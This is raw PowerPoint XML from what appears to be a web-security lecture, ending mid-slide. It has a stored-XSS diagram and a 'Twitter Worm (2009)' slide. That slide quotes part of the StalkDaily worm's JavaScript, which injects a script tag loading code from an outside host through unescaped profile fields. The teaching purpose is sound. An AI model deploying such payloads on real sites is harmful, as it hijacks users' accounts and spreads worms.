              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8668800" y="1734373"/>
            <a:ext cx="482400" cy="381960"/>
            <a:chOff x="8668800" y="1734373"/>
            <a:chExt cx="482400" cy="3819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16F9CD6-FA1C-DC4E-9802-A07C2EDCE56A}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8668800" y="1734373"/>
                <a:ext cx="482400" cy="267480"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="5" name="Ink 4">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{416F9CD6-FA1C-DC4E-9802-A07C2EDCE56A}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId3"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="8632800" y="1698373"/>
                  <a:ext cx="5540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837EB09-32DA-3C4A-B21F-95CE9EB2E36D}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8682840" y="2045413"/>
                <a:ext cx="263520" cy="70920"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="6" name="Ink 5">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9837EB09-32DA-3C4A-B21F-95CE9EB2E36D}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId5"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="8646840" y="2009413"/>
                  <a:ext cx="335160" cy="142560"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </mc:Fallback>
        </mc:AlternateContent>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3660781608"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:overrideClrMapping bg1="dk1" tx1="lt1" bg2="dk2" tx2="lt2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>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18" descr="toshiba_satellite_a105_s4284_laptop">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D45484E-D980-F24B-AFDF-F841D8FDE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601914"/>
            <a:ext cx="1436688"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11" descr="CompaqAlphaServerES40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6F8519E-2742-F242-BB4B-BA4C5C36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75" y="4979988"/>
            <a:ext cx="1155700"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4" descr="DS15serverfront">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E5B35F3-F6BB-A44A-A9CA-DAD613C17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188" y="1905000"/>
            <a:ext cx="2436812"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Text Box 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1D33B14-586B-EA40-AB1F-9B5CBF0CC721}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7467600" y="1524000"/>
            <a:ext cx="1571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660066"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Attack server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77831" name="Text Box 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{680AFC01-3045-B342-9B3E-405233B52DC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8626476" y="5791200"/>
            <a:ext cx="1624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660066"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Server victim </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="77832" name="Straight Arrow Connector 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D65C535-435C-3A49-95B5-0531A8B58E8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="6901657" y="3852069"/>
            <a:ext cx="2200275" cy="1588"/>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33" name="Text Box 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10BD2181-605B-9645-BD09-2F8542553C97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1752600" y="3886200"/>
            <a:ext cx="1359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660066"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>User victim</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77834" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF0736AD-B9EB-F940-9E9F-4A1B68E718A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8305799" y="3276600"/>
            <a:ext cx="17996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rgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Inject malicious script</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="77835" name="Straight Arrow Connector 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3CD22E6-DF25-8844-8FB9-F2D03BCA1D87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3798888" y="3962400"/>
            <a:ext cx="2830512" cy="990600"/>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36" name="TextBox 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DD6EB68-3E36-AB4C-9744-627B4C21F225}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="4560889" y="4067175"/>
            <a:ext cx="2141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40458C"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>request content</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77837" name="TextBox 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8776088-B0FF-2448-81A7-0F872A46A3E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="3835401" y="4568825"/>
            <a:ext cx="2932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40458C"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>receive malicious script</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77838" name="Oval 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C38333F-E342-8B45-8802-6A99CD779F24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8274051" y="2865439"/>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rgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77839" name="Oval 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC797D2A-6778-C642-9E36-505CFBBCF9F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1039646">
            <a:off x="4237039" y="3703639"/>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rgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77840" name="Oval 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15596930-EAF0-CE41-A234-5B0F0C86422A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1068865">
            <a:off x="3608389" y="4086226"/>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rgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="77841" name="Straight Arrow Connector 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA844246-B4DB-3244-A0F7-9ECBD4E59FD2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3276600" y="4324350"/>
            <a:ext cx="3352800" cy="1162050"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="2857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77842" name="Straight Arrow Connector 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06E978D1-C4DC-D642-9708-B6EC6569D1A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="3722688" y="2205039"/>
            <a:ext cx="3211512" cy="687387"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="2857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843" name="TextBox 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D2F44BD-2A4A-BB42-AB7C-A8D8A1C310FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-709076">
            <a:off x="4347017" y="2060545"/>
            <a:ext cx="21739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40458C"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>steal valuable data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77844" name="Oval 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B47005CE-33DF-DC44-840C-5C92C3E395D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-713606">
            <a:off x="3962401" y="2359026"/>
            <a:ext cx="365125" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="12700" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangl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rgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="77845" name="Group 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3197EBAB-59DD-674F-B44D-6F45C7A009F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3276600" y="4248151"/>
            <a:ext cx="6630988" cy="1687513"/>
            <a:chOff x="1752600" y="4248065"/>
            <a:chExt cx="6630193" cy="1688425"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="TextBox 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E06679AA-68BC-454D-BC7E-886BEBB1EFD9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5847859" y="4248065"/>
              <a:ext cx="2534934" cy="400266"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="85000"/>
              </a:schemeClr>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr>
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:buFontTx/>
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Store bad stuff</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="TextBox 22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A661C94C-0D3D-7841-B9B1-0D61C932D5BD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1752600" y="5228082"/>
              <a:ext cx="2534934" cy="708408"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="85000"/>
              </a:schemeClr>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr>
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:buFontTx/>
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Users view or download content</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8A7B5AE-8225-994A-841F-CF8FDCDAE370}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stored XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1716649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CA8DD96F-04C1-F34E-8C95-43D1711C4C3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Twitter Worm (2009)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79875" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C60F56C-B631-A045-BD3C-94E2CCAA4C7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="2103120"/>
            <a:ext cx="10058400" cy="4112286"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Can save URL-encoded data into Twitter profile, data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" u="sng" dirty="0"/>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> escaped when profile is displayed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Result: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>StalkDaily</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> XSS exploit.  If view an infected profile, script infects your own profile.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>update</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>urlencode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("Hey everyone, join </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.StalkDaily.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. It's a site like Twitter but with pictures, videos, and so much more!  ");</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>urlencode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>('http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.stalkdaily.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt;&lt;/a&gt;&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mikeyylolz.uuuq.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>x.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt;&lt;/script&gt;&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
